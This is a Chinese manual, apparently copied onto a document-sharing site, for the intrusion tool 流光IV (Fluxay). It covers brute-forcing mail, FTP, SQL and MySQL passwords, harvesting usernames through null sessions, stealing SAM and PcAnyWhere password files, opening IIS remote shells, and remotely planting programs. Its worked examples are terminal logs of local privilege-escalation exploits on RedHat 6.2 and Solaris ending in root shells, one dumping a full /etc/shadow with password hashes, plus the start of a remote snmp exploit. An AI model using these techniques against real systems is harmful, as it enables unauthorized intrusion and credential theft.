流光5使用方法.docx
- 文档编号:30315774
- 上传时间:2023-08-13
- 格式:DOCX
- 页数:39
- 大小:490.18KB
流光5使用方法.docx
《流光5使用方法.docx》由会员分享,可在线阅读,更多相关《流光5使用方法.docx(39页珍藏版)》请在冰豆网上搜索。
流光5使用方法
一、新增功能
流光IV的高级扫描是和以前版本相比增加的最重要功能之一,包括了如下扫描功能:
PORTS(常用端口、自定义端口)
POP3(Banner、特定版本漏洞、暴力模式)
FTP(Banner、特定版本漏洞、暴力模式)
SMTP(Banner、特定版本漏洞、暴力模式)
IMAP(Banner、特定版本漏洞、暴力模式)
TELNET(Banner、特定版本漏洞)
CGI(Banner、Unix/NT自动识别、ErrorPage检测、规则库可手工加入)
SQL(通过漏洞扫描、暴力模式)
IPC(NETBIOS)(获得用户列表、共享列表、暴力模式)
IIS(IIS漏洞)
FINGER(Finger漏洞扫描)
RPC(UnixFinger漏洞扫描,获得用户列表)
MISC(Bind版本、MySql弱密码扫描)
PLUGIN(可以方便地增加对某种类型漏洞的扫描)
流光IV和以往版本相比增加(修改)了如下功能:
IISRemoteShell (修改,RemoteExecuteA-F)
IPCPipeRemoteShell (新增)
IPC植入者 (新增)
SQLRemoteShell (修改)
PCAnyWhere解码 (新增)
支持HTTPBasic/Negotiate/NTLM方式认证 (新增)
IPC探测 (修改)
IMAP探测 (新增)
二、基本使用方法
从[探测]->[高级扫描功能]启动。
1、设定扫描的范围
▪起始地址/结束地址:
需要扫描的IP地址范围。
▪目标系统:
ALL-所有系统 NT-NT/2000系统 UNIX-UNIX系统,根据选择的不同下面的[检测项目]将会有不同设置。
▪获取主机名:
获取主机的名称。
▪检测项目:
选择需要扫描的项目,根据选择的不同表单会有所不同。
2、端口扫描
▪标准端口扫描:
包括常用的服务端口扫描
▪自定端口扫描:
范围从1-65534
3、POP3扫描
▪获取POP3版本信息:
取得Banner
▪尝试猜解用户:
根据[选项]中的设置对常见用户名进行暴力模式猜解。
4、FTP扫描
▪获取FTP版本信息:
取得Banner
▪尝试匿名登陆:
测试FTP服务器能否匿名登陆
▪尝试猜解用户:
根据[选项]中的设置对常见用户名进行暴力模式猜解。
5、SMTP扫描
▪获取SMTP版本信息:
取得Banner
▪EXPN/VRFY扫描:
通过SMTP的EXPN/VRFY验证用户是否存在。
6、IMAP扫描
▪获取IMAP版本信息:
取得Banner
▪尝试猜解用户帐号:
根据[选项]中的设置对常见用户名进行暴力模式猜解。
7、TELNET扫描
▪获取TELNET版本信息:
取得Banner
8、CGI扫描
▪获取WWW版本信息:
取得Banner
▪根据版本决定采用NT或者UNIX方式:
根据www的版本信息,在扫描的时候自动选择NT规则库或者UNIX规则库。
▪支用HTTP200/502有效:
为了避免不必要的误报,只有HTTP返回200(OK)/502(GatewayError)才认为有效。
流光IV中CGI扫描采用了Error_Page陷阱检测技术,使得一些采用了Error_Page的主机也能够被正常扫描到,这一点是目前几乎所有的CGI扫描器所不具备的。
9、CGIRule设置
▪类型选择:
可以选择ALL、NT、UNIX,如果在[CGI]中选择了[根据版本决定采用NT或者UNIX方式]此项通常无需更改。
▪漏洞列表:
默认扫描列表中的所有规则(全部选中),也可以根据需要只对某一个漏洞或者某几个漏洞进行扫描(仅选择需要的规则即可)。
CGI规则可以根据需要自行扩展,扩展的方法见[CGI规则的扩展]一节。
10、SQL
▪尝试通过漏洞获得密码:
根据IIS的漏洞获得SQL的连接密码。
▪对SA密码进行猜解:
根据[选项]中的设置对SA密码进行暴力模式破解。
11、IPC
▪空连接(NULLSession)扫描:
尝试和远程主机建立空连接,所谓空连接就是创建一个用户名和密码都为空的访问令牌。
▪扫描共享资源:
扫描网络中的共享资源。
共享资源在98/ME/NT/2000中都存在,所不同的在于访问98/ME中共享资源通常无需提供任何凭证(也就是任何人都可以访问);访问NT/2000中的共享资源通常需要提供一个访问凭证(即需要有一个用户名和密码)。
流光IV会对这两种不同的资源进行区分。
▪尝试获取用户名:
NT/2000在默认安装的情况下可以通过空连接获取目标主机的用户名。
▪尝试对获取的用户名进行猜解:
对获得用户名根据[选项]中的设置进行暴力模式破解。
NT在通过IPC建立连接的时候,在同一时间只允许和一台主机建立一个连接,这样以来多线程就毫无用处。
不过如果NT如果同时提供了MSFTP服务就可以通过FTP对用户进行告诉猜解(因为FTP没有同一时间只允许一个连接的限制),流光IV可以自动根据情况选择IPC或者FTP模式的猜解。
▪仅对Administrators组进行猜解:
对获得的用户名进行判断,仅仅对属于Administrators组的用户进行上述猜解。
12、IIS
▪Unicode编码漏洞:
尝试6种方法(RemoeExecuteA-F)扫描Unicode编码漏洞。
▪FrontPage扩展:
扫描是否安装了Frontpage扩展。
如果安装了Frontpage扩展,也可以采用HTTP扫描中的NTLM模式对NT系统帐号进行高速猜解。
共享资源在98/ME/NT/2000中都存在,所不同的在于访问98/ME中共享资源通常无需提供任何凭证(也就是任何人都可以访问);访问NT/2000中的共享资源通常需要提供一个访问凭证(即需要有一个用户名和密码)。
流光IV会对这两种不同的资源进行区分。
▪尝试获取SAM文件:
NT/2000的密码文件存在于SAM文件中,如果获得了SAM文件就可以在本地利用L0pht(下载)进行破解。
▪尝试获取PcAnyWhere密码文件:
尝试获取PcAnyWhere密码文件,获得后,可以用流光IV中工具进行解码(不是暴力破解)。
13、Finger
▪扫描Finger功能:
利用Finger功能可以测试某个用户是否存在。
▪对SunOS尝试获得用户列表:
SunOS的Finger功能由一个特点,可以列出最近登陆的用户名。
在FTP/POP3/IMAP扫描中也会首先进行Finger的测试,如果测试成功就会用获得用户名列表来代替[选项]中的用户名字典。
14、RPC
▪扫描RPC服务:
扫描RPC服务,得到服务的ID的信息。
UNIX中的RPC是漏洞比较多的服务之一,特别是SunOS。
15、MISC
▪BIND版本扫描:
扫描BIND服务,得到版本信息。
▪猜解MySQL密码:
MySQL是UNIX中一种很常见的免费数据库(一般国内常见的模式是NT+IIS+MSSQL/UNIX+Apache+MySQL),得到了MySQL的密码就可以查阅数据库中的所有内容。
16、PLUGINS
▪类型:
ALL、NT、UNIX。
▪PlugIn列表:
列出当前安装的所有PlugIn的信息。
流光IV中的PlugIn是一项很有用的功能,可以很方便地利用现有流光的扫描框架进行扩展。
关于Plugin的具体信息,请参见[如何编写流光IV的插件]。
17、选项
▪猜解用户名字典:
设置扫描中采用的用户字典,适用于POP3/FTP/IMAP/SQL/MYSQL。
▪猜解密码字典:
设置扫描中采用的密码字典,适用于POP3/FTP/IMAP/SQL/MYSQL。
▪保存扫描报告:
扫描的报告,采用HTML格式。
▪并发线程数目:
默认80,可以根据情况增减,如果线程数目越大速度越快但是越容易误报和漏报。
▪网络选项:
设置TCP参数
▪TCP连接超时:
建立TCP连接时的超时设置,默认10秒(10000毫秒)
▪TCP数据超时:
收发数据时的超时设置
如果建立连接或收发数据时出现了超时,则说明连接/收发数据失败。
通常TCP超时设置小,扫描速度就越快,但是就越容易漏报。
如果设置太大,扫描的速度会变慢,但是漏报就比较少。
具体的设置,需要根据自己的的网络状况决定。
一、可以直接测试的部分
流光IV高级扫描完成后,会产生一个扫描报告,此外一部分扫描结果也会在界面上得到直接的反映。
1、IPC
对于IPC的扫描结果,可以直接在上面点左键,出现[连接...]字样,选择执行。
这时出现了NTCMD的界面,NTCMD如果连接成功具有System权限,可以执行命令,例如创建帐号等。
关于IPC的更多信息请参见[流光2000IPC使用说明]。
2、SQL
选择[连接...]出现SQLShell的界面。
如果没有安装SQLServer,那么对方主机必须允许建立空连接才能够连接成功(默认安装Express版,所以首先需要安装SqlRcmdNormal版,在SqlRcmd\Normal中)。
为了让流光IV的SQL扫描发挥最大作用,建议安装SQLServer。
通常情况下,SQLCMD具有System权限,可以执行命令。
如果SQLServer是以用户身份启动,那么就具有启动用户身份的权限。
如果需要将数据库的数据导出,通常需要安装SQLServer。
3、FTP
同上述方法,流光IV会自动调用系统的FTP程序。
4、IISRemoteExecute-X
选择[连接...],出现一个设置的对话框
如果在使用中出现问题,请取消选择[允许IIS检测CMD]。
通常情况下IISRemoteExecute具有IUSR_ComputerName帐号权限。
5、RemoteFTPPCAnyWhere密码文件
使用此功能必须首先拥有一个具有写权限的FTP服务器,以便流光IV将密码文件上传。
出现上传FTP服务器设置的对话框。
如果上传失败(流光IV本身不能确认是否上传成功),请选择[禁止IIS检测CMD]。
上传成功之后,就可连接到自己指定的FTP的服务器,将文件下载到本机,利用流光IV中PCAnyWhere解码工具解码。
这样就可以通过PCAnyWhere连接管理远程主机了。
6、FrontPage扩展
如果扫描到FrontPage扩展,也可以用来暴力破解NT系统帐号(当然这种方法没有直接通过MSFTP快)。
(1)、首先通过IPC得到用户列表(具体方法参见[流光2000IPC探测说明])
(2)、加入HTTP主机
注意后面的URL不要敲错。
(3)、从IPC主机导入
(4)、选择需要探测的用户
(5)、加入字典后开始扫描
注意在HTTP的NTLM和Negotiate模式中只能开启一个线程。
7、IIS5.Printer
可以使用IIS5Hacker测试。
二、其他部分
1、IPC种植者
如果获得了NT/2000机器的Administrators组的密码,也可以通过IPC种植者上传和执行程序(利用Schedule服务和IPC管道)。
从[工具]->[NT/IIS]->[种植者]启动程序。
设置好所需项目后,按[开始]即可上传和制定的程序(当程序复制完之后,大约需要一分钟后程序才会启动)。
2、MySQL
MySQL是UNIX中最常用的免费数据库,流光IV可以检测到MySQL的弱密码。
通过MySQL的客户端程序()连接远程数据库即可查阅数据库的所有信息。
关于MySQL的相关信息请查阅相关资料。
三、UNIX的本地溢出
UNIX的本地溢出,需要由一个具有Shell权限的帐号,通常情况下这一帐号通过弱密码得到。
弱密码可以通过FTP扫描或POP3扫描得到。
所有关于UNIX的溢出测试,均需要由一个UNIX/Linux的环境进行编译。
1、ExampleofRedHat6.2SU
通过Telnet连接到远程主机(推荐用SecureCRT,在流光IV的安装目录中有)。
LinuxRedHat6.2LocalExploit
Kernel2.2.14-6.1onani686
login:
server
Password:
[server@WebServer5server]$ visu.c
[server@WebServer5/tmp]$gcc-osusu.c
[server@WebServer5/tmp]$./su
suexploitbyXP
Enjoy!
Phase1.Checkingpathsandwritepermisions
Checkingfor/usr/bin/msgfmt...Ok
Checkingfor/usr/bin/objdump...Ok
Checkingwritepermisionson/tmp...Ok
Checkingreadpermisionson/bin/su...Ok
Checkingforavalidlanguage...[usingaf_ZA]Ok
Checkingthat/tmp/LC_MESSAGESdoesnotexist...Ok
Phase2.Calculatingeatandpadvalues
......................................................................done
eat=120andpad=2
Phase3.Creatingevillibc.moandsettingenviroment
vars
Phase4.Gettingaddressof.dtorssectionof/bin/su
..........................................done
.dtorsisat0x0804bd3c
Phase5.Compilingsuidshell
/tmp/xpcreatedOk
Phase6.Executing/bin/su
-Enteringrootshell;-)-
bash#id
uid=0(root)gid=0(root)groups=504(server)
bash#cat/etc/shadow
root:
$1$CmIRSoFn$i6/jI1F5jOCYZK21PH3Rl1:
11312:
0:
99999:
7:
-1:
-1:
134539268
bin:
*:
11288:
0:
99999:
7:
:
:
daemon:
*:
11288:
0:
99999:
7:
:
:
adm:
*:
11288:
0:
99999:
7:
:
:
lp:
*:
11288:
0:
99999:
7:
:
:
sync:
*:
11288:
0:
99999:
7:
:
:
shutdown:
*:
11288:
0:
99999:
7:
:
:
halt:
*:
11288:
0:
99999:
7:
:
:
mail:
*:
11288:
0:
99999:
7:
:
:
news:
*:
11288:
0:
99999:
7:
:
:
uucp:
*:
11288:
0:
99999:
7:
:
:
games:
*:
11288:
0:
99999:
7:
:
:
gopher:
*:
11288:
0:
99999:
7:
:
:
nobody:
$1$YFv8hmgw$gr3suN6DxqqLUswxVJ49M.:
11452:
0:
99999:
7:
-1:
-1:
134540196
xfs:
!
!
:
11288:
0:
99999:
7:
:
:
named:
!
!
:
11288:
0:
99999:
7:
:
:
gdm:
!
!
:
11288:
0:
99999:
7:
:
:
piranha:
!
!
:
11288:
0:
99999:
7:
:
:
pvm:
!
!
:
11288:
0:
99999:
7:
:
:
navy:
$1$3H4IuGc7$8r3rutBAdVDtOPnVmwrTw1:
11288:
-1:
99999:
-1:
-1:
-1:
135664172
vip:
$1$hle0b0Lj$923zX.laFy.h/3r42PhwI0:
11312:
-1:
99999:
-1:
-1:
-1:
134540356
sg:
!
!
:
11312:
0:
99999:
7:
:
:
intel:
$1$WfhnTH3y$JDDa31e/UF2CCpcx8zFjA0:
11367:
0:
99999:
7:
-1:
-1:
134540356
server:
$1$6K.xS5bT$u0jAZWbNpq26jDA77b508/:
11386:
0:
99999:
7:
-1:
-1:
134539252
leaf:
$1$Y8k81DPb$GQa54KyUUHHdLqcQTG6Fw0:
11446:
0:
99999:
7:
-1:
-1:
134540308
operator:
$1$uDR7PcOE$7pl2urVWKxGCVogueZFlC0:
11452:
0:
99999:
7:
-1:
-1:
134540332
bash#
2、ExampleofSunOSLocalExploit
对于SunOS的系统同样可以用本地溢出,首先需要做的仍然是得到一个普通帐号。
用流光IV中高级扫描功能扫描某网段,其中得到这样的结果:
Finger扫描
Finger开放
得到用户列表Logindaemonbinsyszhxggydanxumengxizhangzhenggydzzszyliulangwebmastervetvet120
FTP扫描
FTP版本信息:
wwwFTPserver(SunOS5.6)ready.
从结果可以看出,通过Sun的Finger得到了用户列表,同时主机的FTP开放,我们不妨用流光IV的FTP扫描试试。
将主机加入FTP树型列表中,这一次我们不用指定用户列表,可以直接通过Finger获得。
在主机上点右键->[探测]->[SunSolaris用户列表]。
经过简单模式探测后,得到了两个帐号。
通过ScreCRT登陆上去。
SunSolaris5.6SparcLocallpsetExploit
SunOS5.6
login:
webmaster
Password:
Lastlogin:
FriMay1816:
50:
20from211.101.171.222
SunMicrosystemsInc.SunOS5.6GenericAugust1997
%uname-a
SunOS5.6Generic_105181-16sun4usparcSUNW,Ultra-2 //确定系统为SunSolaris2.6Sparc
%cd/tmp
%ls
df.monlast_uuidllbdbase.datps_dataspeckeysd.lock
%ftpxxx.xxx.xxx //从FTP服务器下载编译好的溢出程序(因为通常的Solaris默认安装没有gcc编译器)
Connectedto.
220ProFTPD1.2.1Server(VirtualHosting)[xxx.xxx.xxx]
Name(:
liujy):
xxxxxxx
331Passwordrequiredforxxxxxx.
Password:
ftp>bin
200TypesettoI.
ftp>ftp>getlpset
200PORTcommandsuccessful.
150OpeningBINARYmodedataconnectionforlpset(26148bytes).
226Transfercomplete.
local:
lpsetremote:
lpset
26148bytesreceivedin2.1seconds(12.13Kbytes/s)
ftp>quit
221Goodbye.
%ls
df.monlast_uuidllbdbase.datlpsetps_dataspeckeysd.lock
%chmod777lpset //修改文件属性为可执行
%./lpset
copyrightLASTSTAGEOFDELIRIUMapr2000poland//lsd-
/usr/bin/lpsetforsolaris2.62.7sparc
FNSforfilesisnotinstalled
Cannotusethiscommandinthisenvironment
Use:
fncreate-torgcommandtoinstall
#
//获得Root
四、UNIX的远程溢出
除了本地溢出之外,远程溢出也是一种常见的手段。
1、ExampleofSunSolaris5.7/5.8SparcRPC.snmp
RPCScan
RPCProgramID
snmp[UDP]SunsolarisSparc7.0/8.0GainRootShell
如果出现这样的结果,说明对方系统的RPC中存在一个snmp服务。
多数的SunSolaris5.7/5.8都存在远程溢出。
可以利用流光IV中附带的程序进行测试。
ExampleofSunSolaris5.7SparcRCP.snmp
[root@codeguru/root]#gcc-osnmpsnmp.c
snmp.c:
Infunction`main':
snmp.c:
181:
warning:
passingarg3ofpointertofunctionfromincompatiblepointertype
snmp.c:
181:
warning:
passingarg4ofpointertofunctionfromincompatiblepointertype
snmp.c:
181:
warning:
passingarg5ofpointertofunctionfromincompatiblepointertype
[root@codeguru/root]#./snmpxxx.xxx.xxx.xxx-v7
copyright
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 流光 使用方法